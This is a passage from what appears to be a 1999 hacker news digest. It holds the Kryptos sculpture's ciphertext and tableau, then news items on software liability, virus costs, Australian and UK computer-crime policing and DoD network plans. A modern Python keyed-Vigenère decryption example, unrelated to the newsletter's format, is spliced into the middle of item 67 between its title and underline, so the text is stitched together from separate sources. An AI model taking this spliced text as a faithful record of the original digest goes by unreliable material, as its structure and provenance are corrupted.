     As to the section Stein hasn’t been able to solve, Scheidt says, “That’s still a secret.” And that’s how the sculptor wants it. “I think it’s important that every piece of artwork holds one’s attention for as long as possible,” says Sanborn.

     Still, after nine years, the veil has been pulled back slightly. But the mystery continues, and the CIA says it still wants the message deciphered, if only to show it enjoys the challenge.

     Your Turn

     We invite you to try cracking the code. You can see the full code at the bottom of this page. Mull it over and then post your guesses on the message board above or use the board to discuss things with fellow cryptographers. And then we will see whether one of our readers can accomplish what the CIA has not in nearly a decade.

     Need a Hint?

     We have posted a partial transcript of an interview with Stein to help you. Each day we will post a portion of what Stein has already deciphered. Look for it at the bottom of the yellow box.

     The Full Code

     Left Side

     EMUFPHZLRFAXYUSDJKZLDKRNSHGNFIVJ
     YQTQUXQBQVYUVLLTREVJYQTMKYRDMFD
     VFPJUDEEHZWETZYVGWHKKQETGFQJNCE
     GGWHKK?DQMCPFQZDQMMIAGPFXHQRLG
     TIMVMZJANQLVKQEDAGDVFRPJUNGEUNA
     QZGZLECGYUXUEENJTBJLBQCRTBJDFHRR
     YIZETKZEMVDUFKSJHKFWHKUWQLSZFTI
     HHDDDUVH?DWKBFUFPWNTDFIYCUQZERE
     EVLDKFEZMOQQJLTTUGSYQPFEUNLAVIDX
     FLGGTEZ?FKZBSFDQVGOGIPUFXHHDRKF
     FHQNTGPUAECNUVPDJMQCLQUMUNEDFQ
     ELZZVRRGKFFVOEEXBDMVPNFQXEZLGRE
     DNQFMPNZGLFLPMRJQYALMGNUVPDXVKP
     DQUMEBEDMHDAFMJGZNUPLGEWJLLAETG
     ENDYAHROHNLSRHEOCPTEOIBIDYSHNAIA
     CHTNREYULDSLLSLLNOHSNOSMRWXMNE
     TPRNGATIHNRARPESLNNELEBLPIIACAE
     WMTWNDITEENRAHCTENEUDRETNHAEOE
     TFOLSEDTIWENHAEIOYTEYQHEENCTAYCR
     EIFTBRSPAMHHEWENATAMATEGYEERLB
     TEEFOASFIOTUETUAEOTOARMAEERTNRTI
     BSEDDNIAAHTTMSTEWPIEROAGRIEWFEB
     AECTDDHILCEIHSITEGOEAOSDDRYDLORIT
     RKLMLEHAGTDHARDPNEOHMGFMFEUHE
     ECDMRIPFEIMEHNLSSTTRTVDOHW?OBKR
     UOXOGHULBSOLIFBBWFLRVQQPRNGKSSO
     TWTQSJQSSEKZZWATJKLUDIAWINFBNYP
     VTTMZFPKWGDKZXTJCDIGKUHUAUEKCAR

     Right side

     ABCDEFGHIJKLMNOPQRSTUVWXYZABCD
     AKRYPTOSABCDEFGHIJLMNQUVWXZKRYP
     BRYPTOSABCDEFGHIJLMNQUVWXZKRYPT
     CYPTOSABCDEFGHIJLMNQUVWXZKRYPTO
     DPTOSABCDEFGHIJLMNQUVWXZKRYPTOS
     ETOSABCDEFGHIJLMNQUVWXZKRYPTOSA
     FOSABCDEFGHIJLMNQUVWXZKRYPTOSAB
     GSABCDEFGHIJLMNQUVWXZKRYPTOSABC
     HABCDEFGHIJLMNQUVWXZKRYPTOSABCD
     IBCDEFGHIJLMNQUVWXZKRYPTOSABCDE
     JCDEFGHIJLMNQUVWXZKRYPTOSABCDEF
     KDEFGHIJLMNQUVWXZKRYPTOSABCDEFG
     LEFGHIJLMNQUVWXZKRYPTOSABCDEFGH
     MFGHIJLMNQUVWXZKRYPTOSABCDEFGHI
     NGHIJLMNQUVWXZKRYPTOSABCDEFGHIJ
     OHIJLMNQUVWXZKRYPTOSABCDEFGHIJL
     PIJLMNQUVWXZKRYPTOSABCDEFGHIJLM
     QJLMNQUVWXZKRYPTOSABCDEFGHIJLMN
     RLMNQUVWXZKRYPTOSABCDEFGHIJLMNQ
     SMNQUVWXZKRYPTOSABCDEFGHIJLMNQU
     TNQUVWXZKRYPTOSABCDEFGHIJLMNQUV
     UQUVWXZKRYPTOSABCDEFGHIJLMNQUVW
     VUVWXZKRYPTOSABCDEFGHIJLMNQUVWX
     WVWXZKRYPTOSABCDEFGHIJLMNQUVWXZ
     XWXZKRYPTOSABCDEFGHIJLMNQUVWXZK
     YXZKRYPTOSABCDEFGHIJLMNQUVWXZKR
     ZZKRYPTOSABCDEFGHIJLMNQUVWXZKRY

     HINT OF THE DAY

     “Kryptos” Completed Plaintext.

     Top Half.

     BETWEEN SUBTLE SHADING AND THE ABSENCE OF LIGHT LIES THE NUANCE OF ILLUSION. THEY USED THE EARTH’S MAGNETIC FIELD. THE INFORMATION WAS GATHERED AND TRANSMITTED UNDERGROUND TO AN UNKNOWN LOCATION. DOES LANGLEY KNOW ABOUT THIS? THEY SHOULD ITS BURIED OUT THERE SOMEWHERE. ONLY WW. THIS WAS HIS LAST MESSAGE. THIRTY-EIGHT DEGREES FIFTY-SEVEN MINUTES SIX POINT FIVE SECONDS NORTH SEVENTY-SEVEN DEGREES EIGHT MINUTES FORTY-FOUR SECONDS WEST ID BY ROWS.

     (Bottom Half)

     SLOWLY DESPARATLY SLOWLY THE REMAINS OF PASSAGE DEBRIS THAT ENCUMBERED THE LOWER PART OF THE DOORWAY WAS REMOVED WITH TREMBLING HANDS I MADE A TINY BREACH IN THE UPPER LEFT HAND CORNER AND THEN WIDENING THE HOLE A LITTLE I INSERTED THE CANDLE AND PEERED IN THE HOT AIR ESCAPING FROM THE CHANBER CAUSED THE FLAME TO FLICKER BUT PRESENTLY DETAILS OF THE ROOM WITHIN EMERGED FROM THE MIST. CAN YOU SEE ANYTHINGQ?

@HWA

65.0 Pirates of Silicon Valley
     ~~~~~~~~~~~~~~~~~~~~~~~~~

     June 18th 1999

     From HNN http://www.hackernews.com/

     Pirates of Silicon Valley
     contributed by Silicosis

     'Pirates of Silicon Valley' airs on TNT this Sunday at 8pm. The show is supposed to detail the history of Apple & Microsoft. While this info is going to be plastered everywhere else, it may be worth watching (if you have nothing better to do, after all, they are old school hackers).

     TNT
     http://tnt.turner.com/movies/tntoriginals/pirates/

     If you missed this show it's available on the web via the newsgroups, not that I condone such activity - Ed ;)

@HWA

66.0 .mil hacker cartoon
     ~~~~~~~~~~~~~~~~~~~~

     June 18th 1999

     From HNN http://www.hackernews.com/

     Cartoon
     contributed by carole

     Here is a rather funny cartoon, found in a rather interestingly funny place.

     www.nswc.navy.mil
     http://www.nswc.navy.mil/ISSEC/Gif/cartoons/hacked.gif

     ** This url is of course, dead now. Anyone have a copy of the gif?, i'll check PacketStorm too...

@HWA

67.0 If Software Breaks Who is Liable?
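     The tableau and ciphertext reproduced below are enough to work the cipher by hand, but the mechanics are easier to see in code. The following is an added example, not code from HWA, HNN, ABC News or the sculptor: it rebuilds the tableau rows from the keyed alphabet KRYPTOSABCDEFGHIJLMNQUVWXZ that every row of the "Right side" listing is a rotation of, and decrypts the first two rows of the "Left Side" listing. Both plaintext and key letters are indexed in the keyed alphabet (a keyed, or "Quagmire III", Vigenere). The key word PALIMPSEST is the publicly reported solution for that first section; it does not appear on this page and is an assumption of the example.

```python
"""Kryptos-style keyed Vigenere decryption (added, illustrative example).

The tableau has the plain alphabet as its header row and, under each row
label A..Z, the keyed alphabet KRYPTOSABCDEFGHIJLMNQUVWXZ rotated one place
further per row.  Both the plaintext letter and the key letter are looked up
in that keyed alphabet K, so  c = K[(idx(p) + idx(k)) mod 26]  and
p = K[(idx(c) - idx(k)) mod 26].  The key word PALIMPSEST is an assumption
(the publicly reported solution), not something stated on the page.
"""

KEYED = "KRYPTOSABCDEFGHIJLMNQUVWXZ"   # row A of the tableau, first 26 letters
PLAIN = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"   # the tableau's header row

# Constructed from the first two rows of the "Left Side" listing.
K1_CIPHERTEXT = "EMUFPHZLRFAXYUSDJKZLDKRNSHGNFIVJ" "YQTQUXQBQVYUVLLTREVJYQTMKYRDMFD"
K1_KEY = "PALIMPSEST"   # assumed key word; not printed on the page


def tableau_row(label: str, width: int = 30) -> str:
    """Rebuild the tableau row printed under `label` (label not included).

    Row A is the keyed alphabet as is, row B is it rotated by one, and so
    on; the listing prints 30 letters per row, so the last four wrap round.
    """
    shift = PLAIN.index(label.upper())
    rotated = KEYED[shift:] + KEYED[:shift]
    return (rotated * 2)[:width]


def _clean(text: str) -> str:
    """Keep only letters of the keyed alphabet (drops spaces, newlines, '?')."""
    return "".join(ch for ch in text.upper() if ch in KEYED)


def _key_indices(key: str, length: int) -> list:
    """Keyed-alphabet index of each key letter, cycled out to `length`."""
    key = _clean(key)
    return [KEYED.index(key[i % len(key)]) for i in range(length)]


def decrypt(ciphertext: str, key: str) -> str:
    """p = K[(idx(c) - idx(k)) mod 26] for each letter and its key letter."""
    letters = _clean(ciphertext)
    return "".join(
        KEYED[(KEYED.index(c) - k) % 26]
        for c, k in zip(letters, _key_indices(key, len(letters)))
    )


def encrypt(plaintext: str, key: str) -> str:
    """Inverse of decrypt: c = K[(idx(p) + idx(k)) mod 26]."""
    letters = _clean(plaintext)
    return "".join(
        KEYED[(KEYED.index(p) + k) % 26]
        for p, k in zip(letters, _key_indices(key, len(letters)))
    )


def k1_plaintext() -> str:
    """Decrypt the first section with the assumed key word."""
    return decrypt(K1_CIPHERTEXT, K1_KEY)


if __name__ == "__main__":
    # Sanity-check the reconstruction against a row from the listing, then decrypt.
    assert tableau_row("K") == "DEFGHIJLMNQUVWXZKRYPTOSABCDEFG"
    print(k1_plaintext())
```

     The decryption comes out as BETWEEN SUBTLE SHADING ... NUANCE OF IQLUSION: the letters as cut on the sculpture, which the plaintext transcript later in this section regularises to ILLUSION. The keyed alphabet changes nothing about the cipher's strength: it is still a periodic polyalphabetic substitution with a ten-letter period, so the classical Kasiski and index-of-coincidence attacks on Vigenere apply unchanged once enough ciphertext is available.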
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     June 21st 1999

     From HNN http://www.hackernews.com/

     contributed by Weld Pond

     Companies that manufacture toasters, cars, and other products are liable for defects in their goods but not software companies. According to the license agreements you agree to when installing software the manufacturer is not liable for anything. Software is often shipped with humongous problems that the manufacturer knew about yet there is no accountability.

     Boston Globe
     http://www.globe.com/dailyglobe2/171/focus/You_lose_+.shtml

     COMMERCE

     You lose!
     Cars and toasters are expected to work. But bad software is a norm, and the industry wants to keep it that way
     By Charles Palson, 06/20/99

     The engine in your new car self-destructs after a five-minute drive. The dealer later tells you the manufacturer knowingly produced the defect, but you have to pay for a new engine anyway. That's because the automakers convinced Congress that consumer protection laws would drive up car prices beyond the reach of the average buyer, so the laws were changed to exempt the companies.

     Sound like B-grade fiction? Unfortunately, the answer is: not for the American software industry. Their intention is clearly stated in the licensing agreement displayed on your monitor when you install new software. Clicking OK means you agree that the manufacturer bears no responsibility for defects. Did you find features that don't work as advertised? Truth-in-advertising laws don't apply. Did the program erase your hard drive? So what. Did the manufacturer have prior knowledge of 95 percent of all the defects beforehand, the industry average? Irrelevant. You might be able to return the product, but your time, whatever it is worth, is lost. It's the law.

     But not according to some courts, which have recently declared these licenses illegal because they contradict provisions in the Uniform Commercial Code, the grandfather of all consumer-protection laws.

     The software industry, seeing where this liability could lead, now wants to exclude itself from the minimal consumer protections offered under the code. Its argument? Perfect or error-free software would be either impossible or too expensive to produce.

     ''Perfect'' was carefully chosen for its emotional effect. After all, everyone knows that achieving perfection is beyond any mortal. But it's a false argument. The Uniform Commercial Code doesn't mention anything about perfection; it states in essence that a product should be fit for ordinary use and conform to printed claims. If other American industries have managed to conform to the code, why should software be any different?

     Several reputable specialists this writer interviewed don't think it should be. One of these, Ken Johnson, who is director of Minnesota's Rochester Technology Center, a division of D.H. Andrews Inc., and who is a former IBM software executive, is sure that software companies can produce top-quality products.

     Johnson should know. He helped manage a now legendary project that produced the IBM AS400 computer. A huge effort at the time, the developers delivered on schedule, and any significant defects were fixed in a timely manner. And the price was reasonable. Actually, counting both direct and indirect costs, the AS400 still costs significantly less than comparable products from other companies, and it delivers more reliability.

     The lesson is that, contrary to what industry spokesmen claim, high quality at reasonable prices is indeed possible. With a few notable exceptions, however, the industry as a whole chooses to continue producing software riddled with defects that often make a mockery of extravagant advertising claims.

     Microsoft, for example, shows every intention of continuing the practice of publicizing features that don't necessarily work. Not one word on the well-known issue can be found in company president Steve Ballmer's recent lengthy announcement that quality will take center stage. When this writer questioned spokeswoman Marla Polenz on the issue, she couldn't find anyone to talk about it.

     Perhaps nothing more eloquently illustrates the problems in Microsoft than the fact that it cannot readily use its own flagship business product, NT Server, for some mission-critical applications, such as shipping, because it is too unreliable. According to several people close to IBM and Microsoft, the latter uses AS400s when reliability really counts. Gartner Group studies tracking computer reliability say that average downtime for NT Servers is more than a half-hour per day, compared with a fraction of a second for the AS400. That's a lot of lost revenue in a year.

     But it should be emphasized that this is not just a Microsoft problem. Cem Kaner, lawyer, former software engineer, and nationally known spokesman on software quality, stresses that the great majority of companies knowingly issue software with substantial defects. He, along with many other observers, estimates that software manufacturers already know 95 percent of all the bugs when they put their programs on the market.

     Why the quality gap between IBM and so many other companies? According to Kaner, the answer in principle is simple: Product quality sometimes takes a back seat to getting products out the door for immediate profit. The whole story, however, is more complex. The problem starts at the beginning of a project when managers invariably underestimate the development time requirements by a wide margin. When the projected completion date arrives, pressure builds from anxious marketing and financial departments that have made commitments based on the promised date. Often, the product is finally released under pressure despite defects.

     The nature of the problem is well known in the industry. Roger Sherman, former Microsoft director of testing, acknowledged, for example, that bad schedules are responsible for most quality problems.

     How has IBM largely found a resolution? According to Johnson, the operative word is experience. Lots of it. Key development personnel at IBM have carefully worked in different capacities on many successful projects. These people have acquired through experience the knowledge it takes to make useful time estimates. They know it is a little more expensive to take such necessary measures to produce the first product version, but they also know that, in the long run, it is less expensive because the considerable costs associated with defects drop dramatically. ''The AS400 development team created and still adheres to meticulous quality practices,'' says Johnson.

     A shift to more reliable software will not be easy. In any industry described by observers as freewheeling, young and brash, the word ''meticulous'' might as well be Sanskrit. Computer science departments don't teach its practical meaning, and most software developers lack even the awareness that quality, accurate scheduling, and reasonable cost are not mutually contradictory.

     But the point remains: Optimal software quality is doable, and any protestations to the contrary are, well, whining. Without even the currently minimal penalties under the Uniform Commercial Code, the industry would have even less incentive to reform itself. Indeed, some observers, such as Mark Paulk, professor at the computer science department of Carnegie Mellon University, believe that the code should have stricter provisions to increase the penalties for poor software quality. If the industry felt the pain currently only felt by consumers, the pain would be a positive impetus for change.

     This story ran on page E01 of the Boston Globe on 06/20/99.
     © Copyright 1999 Globe Newspaper Company.
@HWA

68.0 Trinux Release 0.61
     ~~~~~~~~~~~~~~~~~~~

     June 21st 1999

     From HNN http://www.hackernews.com/

     contributed by mdfranz

     Besides upgrading to glibc2 and Linux kernel 2.2.x, Trinux 0.61 now offers remote package loading via wget, updated versions of many of the tools you know and love (such as nmap and ntop) and new additions like hping, cgichk, mns, and SAINT (well, at least the scanner's underneath, who needs the sorry Web/CGI interface). Just like before, all on 2 floppies and without disturbing the other operating systems on your PC. The standard kernel now provides support for the most common Ethernet cards and with more reliable DHCP support, booting Trinux from your school/office PC has never been easier.

     Trinux
     http://www.trinux.org

69.0 Australia Looks to Increase Local Police Powers
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     June 21st 1999

     From HNN http://www.hackernews.com/

     contributed by Code Kid

     The Electronic Transactions Bill, expected to be introduced in the Australian Parliament in the spring session, will give local police departments more authority when investigating computer crimes. Many computer crimes involve computer trespass and criminal damage, neither of which has extra-territorial provisions. This new bill will give police powers to investigate crimes even when they originate outside their normal jurisdictions.

     The Age
     http://www.theage.com.au/daily/990620/news/news11.html

     Police may go after interstate hackers
     By DAVID ADAMS

     The State Government is considering giving police greater powers to investigate computer hackers operating from interstate.

     Because hacking normally involves offences of computer trespass and criminal damage - neither of which has extra-territorial provisions - police have limited powers to pursue hackers who attack Victorian companies from interstate.

     Under the Draft Electronic Commerce Framework Bill, released for public comment in December, it was proposed that the new offences of unlawful access to data in a computer and of damaging data in a computer be introduced into the Victorian Crimes Act 1958.

     The draft bill also provided for police in Victoria to investigate people interstate committing the new offences provided there was a substantial link to Victoria. The period of public consultation ended in February.

     The bill, since renamed the Electronic Transactions Bill, is expected to be introduced in Parliament in the spring session.

     A spokesman for the Minister for Information and Multimedia, Mr Alan Stockdale, said that he could not disclose what was in the bill until it was presented in Parliament. But he said there had been considerable consultation.

     The head of the Victoria Police computer crime investigation squad, Detective Senior Sergeant David Caldwell, said that it was less common for hackers to operate across state borders than inside their own state.

     He said that most hacking incidents in Victoria were motivated by curiosity rather than malice but organised gangs of hackers and individuals were known to deliberately target companies. Reasons included revenge or notoriety.

     In one case last year, a Glen Waverley man known by the name of ``Number Crunch'' claimed to have broken into the computer systems of 1300 companies in all Australian capital cities in a two-week hacking spree that caused $130,000 damage.

     Each time the man entered a company's computer system, he left behind a message informing it of its victim number and asking it to report the invasion to one of two telephone numbers, those of Melbourne television Channels 9 and 7.

     Detective Senior Sergeant Caldwell said that hacking had been identified as one of the greatest security threats facing companies, but some companies still appeared to have a ``false sense of security''.

     Last year, a joint Victoria Police and Deloitte Touche Tohmatsu survey found that 11 per cent of companies failed to have any security policy in place when connecting to the Internet.

     In the poll of about 90 of Australia's largest companies, one-third said their computer systems had been attacked in the previous 12 months. Of those, 58 per cent were attacked from an external source.

     Sixty-four per cent of companies said that hacking was the greatest security concern in the future.

@HWA

70.0 Aussie Gov Downloads Porn
     ~~~~~~~~~~~~~~~~~~~~~~~~~

     June 21st 1999

     From HNN http://www.hackernews.com/

     contributed by Weld Pond

     The Australian Protective Service, similar in function to the US Secret Service, has found that six of its members downloaded pornography over the internet while on the job. The Australian Defense Department is conducting an investigation.

     32 Bits Online
     http://www.32bitsonline.com/news.php3?news=news/199906/nb199906175&page=1

     Australian Govt Security Officers Caught Downloading Porn

     Officers in the Australian Protective Service, the Federal Government's protective security agency, are being investigated after a "routine" sweep found they had downloaded pornography from the Internet while on duty.

     The Australian Defence Department is conducting the inquiry into the use of Defence Department computers in its Canberra headquarters to download pornographic images by six officers, according to the Australian Broadcasting Corporation (ABC).

     A spokesman told the ABC that the incidents were not considered a serious breach of security but an investigation would ensue, with all APS officers banned from using the department's Internet links while it is conducted.

     The APS is responsible for the protection of Parliament House in Canberra, the residences of the Prime Minister and the Governor-General, foreign diplomatic missions, airport security and defense establishments around Australia.
     The use of government computers to access pornography on the Internet was highlighted recently by an adult Website operator. The site owner publicized the Internet domain names of a number of Australian government agencies, including the Defence Department, that regularly accessed the adult site in protest at Australian Internet legislation that requires ISPs to block and filter access to material on the Internet (Newsbytes, May 28, 1999).

@HWA

71.0 Software Glitch or Security Breach
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     June 21st 1999

     From HNN http://www.hackernews.com/

     contributed by Weld Pond

     When all else fails, claim a 'hacker' did it. After some customers received discounts of as much as 85%, Microworkz faxed at least one customer claiming that their security had been breached. Later, when contacted by a reporter, they denied it and claimed it was due to a software problem.

     ZD Net
     http://www.zdnet.com/zdnn/stories/news/0,4586,2279360,00.html?chkpt=zdnnstop

72.0 Viruses Cost Companies Big Dough
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     June 21st 1999

     From HNN http://www.hackernews.com/

     contributed by nvirB

     In the first two quarters of 1999 viruses have cost US businesses 7.6 billion in lost revenue. Computer Economics of Carlsbad, California has completed a study that says the amount can be attributed to computer downtime and the expense of dealing with the virus infestations.

     Wired
     http://www.wired.com/news/news/technology/story/20297.html
     Fox Market Wire
     http://foxmarketwire.com/061999/virus.sml
     Computer Economics, Inc.
     http://www.computereconomics.com/

     Wired;

     Viruses Cost Big Bucks
     Wired News Report
     12:20 p.m. 18.Jun.99.PDT

     Businesses worldwide have lost a total of US$7.6 billion in the first two quarters of 1999 at the hands of Melissa, the Explore.Zip worm and other viruses, a new study finds.

     Computer Economics of Carlsbad, California said the costs resulted from lost productivity due to computer downtime, and the expense of dealing with virus attacks.

     The study also predicted that the frequency of the attacks will continue at the current rate, and that systems failures could be more severe.

     Computer Economics polled 185 large companies and totaled their combined losses.

     Michael Erbschloe, vice president of research for Computer Economics, said that companies must make an investment in security to prevent further damage from viruses.

     "We've surveyed people in IT organizations for the last 12 years," Erbschloe said. "We're constantly getting the response that computer security is underfunded."

     -=-

     Fox Market Wire;

     Computer Virus Costs to Business Surge
     11.09 a.m. ET (1509 GMT) June 19, 1999

     NEW YORK — Computer virus and "worm" attacks on information systems have caused businesses to lose a total of $7.6 billion in the first half of 1999 as a result of disabled computers, a research firm said Friday.

     The cost of viruses and worms — computer bugs spread by e-mail that can cause system shutdowns — was about five times larger in the first six months of 1999 than businesses suffered during all of last year, said Computer Economics Inc.

     The most recent study was based on 185 companies representing 900,000 international users, while the 1998 survey used slightly different methodology, researcher Michael Erbschloe said.

     "The numbers probably came out low," he said. "It is a conservative number in that not everyone tracks cost, and most companies tend to undercount and underreport."

     He said the $7.6 billion figure represented lost productivity and repair costs reported by the company. The 1998 figure of about $1.5 billion also included "intrusions" to corporate systems, in addition to general virus attacks.

     Erbschloe said this year's high profile attacks by ExploreZip worm, which erased computer files and caused the shutdown of some corporate e-mail systems, and the Melissa virus, which spread quickly but did not destroy data, would only draw more attacks.

     "Hackers don't like to be outdone," he said. "And most companies are underfunding their security efforts."

     -=-

@HWA

73.0 B4B0 Issue 8 Released.
     ~~~~~~~~~~~~~~~~~~~~~

     June 21st 1999

     From HNN http://www.hackernews.com/

     contributed by tip

     The latest and greatest issue of B4B0 has been released. Articles discuss issues on system/network security, humor, as well as dementia. Their primary focus has always been the liberation of normalcy, and hopefully the redline youth of the world will turn the new trend in the gospel sound.

     B4B0
     http://www.b4b0.org

@HWA

74.0 f41th Issue 7
     ~~~~~~~~~~~~~~

     June 21st 1999

     From HNN http://www.hackernews.com/

     contributed by D4RKCYDE

     D4RKCYDE have released f41th issue 7, the 3rd installment to the magazine. This issue contains even more than before, with in-depth articles such as '5ESS Compact Digital Exchanges' and 'Chronus ICMP Packet Timestamps' with much, much more.

     f41th
     http://darkcyde.system7.org

75.0 DOD Considers New Network
     ~~~~~~~~~~~~~~~~~~~~~~~~~

     June 22nd 1999

     From HNN http://www.hackernews.com/

     contributed by dis-crete

     In an effort to defend against frequent cyber attacks, the Pentagon is considering building a new computer network to handle e-commerce and public web pages, cutting off existing connections to the Internet. This follows an increase in the rate of successful attacks on the Non-Classified Internet Protocol Router Network (NIPRNET). While a separate network sounds like a good idea in theory, the practicalities of completely separating NIPRNET from the Internet will not be easy.
     Federal Computer Week
     http://www.fcw.com/pubs/fcw/1999/0621/fcw-newsnetwork-6-21-99.html

     JUNE 21, 1999

     Cyberattacks spur talk of 3rd DOD network
     New network would support e-commerce and public access to DOD Web sites

     BY BOB BREWIN (antenna@fcw.com) AND DANIEL VERTON (dan_verton@fcw.com)

     As part of a strategy to defend its unclassified networks against relentless cyberattacks, the Pentagon may establish a new network to handle electronic commerce and other interactions with the public while cutting off all other existing connections to the Internet.

     The proposal follows an increase in the rate of cyberattacks -- many stemming from the Kosovo conflict -- on the Non-Classified Internet Protocol Router Network (NIPRNET), through which the department transmits unclassified information, including some tactical data, via the Internet.

     Marv Langston, deputy assistant secretary of Defense for command, control, communications and intelligence (C3I), said top DOD officials have begun debating whether to disconnect NIPRNET from the Internet and create another network, a so-called third layer, which would provide Internet links between DOD and e-commerce partners and provide the public with access to military Web pages.

     The proposed strategy, under debate by DOD officials, would leave the department with three layers of networks: the Secret Internet Protocol Router Network, for classified information; NIPRNET, which would become a virtual private network for internal DOD communications; and the new network, through which the department would communicate with its business partners and the public.

     John Hamre, deputy secretary of Defense, framed the issues behind the policy debate in stark terms last week, calling the short air campaign in Yugoslavia against Serbia "the first cyberwar," citing Serb attacks against NATO's public World Wide Web pages.

     "We were under a cyberattack in our operations against Serbia," Hamre said at last week's GovTechNet International Conference and Exhibition. DOD is vulnerable to such attacks because the department "routinely operates in commercial cyberspace" using NIPRNET, he said.

     Lt. Gen. William Campbell, the Army's director for C3I, called the current NIPRNET policy "close to madness" because it is used to actively support military operations. Campbell, who would like to see DOD set up the third-layer network, said the Pentagon should not compromise the security of NIPRNET to support e-commerce and interactions with the public. "The [e-commerce] tail should not wag the C3I dog," Campbell said.

     Tim Bass, president and chief executive officer of the security consulting firm The Silk Road Group Ltd., said the third layer is a very wise plan. "Denial-of-service attacks against [Internet Protocol] networks are a real threat, and there is no disagreement that IP is highly vulnerable," Bass said. "Furthermore, nonclassified IP access to the Internet is now a mission-critical requirement."

     Rick Forno, a security officer for Network Solutions Inc. and a former senior security analyst at the House of Representatives' Information Resources Security Office, also said DOD's plan is plausible. "All public-access networks should be on a completely compartmented environment from anything [classified "For Official Use Only"] or higher, including day-to-day routine local-area networks," he said. If properly carried out, the policy "will be a great solution," Forno said.

     However, the proposed strategy is not without some obstacles, DOD officials said. Langston, who also serves as DOD's deputy chief information officer, which gives him a key role in the network security policy debate, said, "It is difficult to unplug [DOD] from the Internet." Establishing a third layer would, in essence, set up another U.S., if not global, DOD network, which would be expensive, Langston said.

     Langston advocates protecting NIPRNET by copying a Navy initiative to secure networks with an array of technology, including intrusion-detection systems, firewalls and encryption technology. The Navy has developed its "defense in-depth" strategy as part of an effort to build a secure Navywide intranet. Langston believes the strategy obviates the need to pull the Internet plug except under the most extreme circumstances. "The only reason to pull off the Internet is a massive cyberattack," Langston said.

     Rear Adm. John Gauss, commander of the Space and Naval Warfare Systems Command, supports an ongoing NIPRNET redesign, which would involve the Defense Information Systems Agency upgrading the network's security measures. "What DISA's doing will protect DOD computing and still give us a viable means of communicating with industry," Gauss said.

     Lt. Gen. William Donahue, director of communications and information for the Air Force, agreed that disconnecting NIPRNET from the Internet is not a viable option. "We're not going to disconnect from the Internet because we depend on it for too much," he said. But, he added, "You have to balance the need to connect with the need to protect."

     Although a decision has not yet been made about the third network, Donahue envisions DOD reaching a stage where it initially will shut down all connections between NIPRNET and the Internet, closing all "back door" connections, and then reconnect DOD with a smaller number of open connections. "There will probably be a finite number of connections to the Internet, and they will be protected," Donahue said. When that occurs, DOD still will need "to be serious, dedicated, dogged and persistent in protecting our network nodes," he said.

     But Campbell will continue to push to cut off DOD from the Internet. "If you are going to be a pioneer...you cannot be faint of heart."
@HWA

76.0 NCIS Calls For National Computer Crime Squad
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 22nd 1999

From HNN http://www.hackernews.com/

contributed by Code Kid

The UK National Criminal Intelligence Service (NCIS) has called for the creation of a national cyber force in England to fight the increasing amount of online crime. While the Metro police in London do have a computer crime unit there is no national organization.

BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_375000/375156.stm

Sci/Tech

Cyber criminals feel the heat

By Internet Correspondent Chris Nuttall

A national cyberforce of computer specialists is needed to combat a rising tide of online crime, according to a major report by the UK National Criminal Intelligence Service (NCIS).

Project Trawler, a three-year study of Internet crime, foresees a struggle between criminals and those trying to prevent illegal activities over the mastery of Net technology and information.

It says crimes currently being committed include paedophilia, pornography, hacking, hate sites, fraud and software piracy. Criminals' use of the Net for secure communications is an emerging problem.

Interception powers being eroded

The director general of NCIS, John Abbott, told a news conference: "I believe that serious consideration should be given to the establishment of a national investigative computer crime unit to combat the growing number of computer crimes being carried out in the UK and to identify and target emerging threats.

"Furthermore, any such unit should be intelligence-led, separating out the minor offenders from those with both the motivation and capability to commit serious crimes."

On the day the Home Office released a consultation paper on the review of the Interception of Communications Act, the report says existing capabilities to lawfully intercept communications and search seized computers will be eroded by the Internet.

"Potentially this would seriously damage law enforcement's ability to fight serious and organised crime," it says.

Home Secretary to bolster interception

The Home Secretary, Jack Straw, said he was determined his proposals would "maintain interception as the most powerful weapon in the armoury against crime."

"It often provides the vital intelligence or the crucial piece of the jigsaw in solving such crimes with on average, one in two interception warrants resulting in an arrest", he said.

"But in recent years their capability has come under threat - sophisticated criminals and terrorists have been quick to exploit a revolutionised communications industry and dated legislation on interception."

The proposals, detailed on the Home Office Website, include creating a single legal framework to regulate interception of all networks both public and private, wireless telegraphy and interception of mail.

Encryption expertise needed

Regarding Project Trawler's recommendations, the Metropolitan Police in London has a computer crime unit, but there is no such national organisation.

MPs of the Trade and Industry Select Committee said last month there was a case for such a body in order to combat criminals using encryption to organise their illegal activities over the Internet.

NCIS says a national unit would investigate the most serious offences, develop Internet expertise and support local forces encountering sophisticated cybercrimes.

Call for international co-operation

Given the global reach of the Net, the report emphasises that international co-operation is also vital. This includes combined law enforcement operations, extra-territorial jurisdiction and consistent extradition of criminals.

It points out that last year's Operation Cathedral had demonstrated the effectiveness of co-ordinated international action by law enforcement against paedophile rings. This involves both exchanging information at the preliminary stage and preventing paedophiles tipping off other ring members when arrests and seizures are made.

The creation of a central library of known paedophilic images at an international level would both aid the search for victims and help to determine the nature of offences, it says.

Cyber complaints on the rise

NCIS suggests that filed complaints of cyber crimes have risen from 12,000 in 1997 to more than 40,000 in 1998.

But, in an apparent reference to media coverage of the Internet, it says it does not assess the risks or scale of criminal activity on the Internet to be as extensive as sometimes portrayed.

The report's author, David Hart, says there is a need for preventative steps now to avoid having to deal with a bigger problem later:

"If the rewards are great enough and the risks low enough then undoubtedly established criminals will migrate to the new territory of the Internet.

"But, at the moment, even if they had the motivation, it's not evident that they have the capability to commit serious computer crimes. They could recruit or coerce people who do have the capabilities but there are associated risks with that."

Future threats

NCIS says the 1990 Computer Misuse Act allows for penalties of up to five years in jail and unlimited fines.

In future, it says, offences inspired by political motives, hacking for information with financial value and "work rage" assaults on systems will feature more.

The approach of the year 2000 is likely to spur some program writers to create viruses triggered by the 01/01/2000 date.

Project Trawler will be available on the NCIS Website in an unclassified version. The full report with extensive statistics will be available to law enforcement agencies and government departments.

Report welcomed by cyber rights group

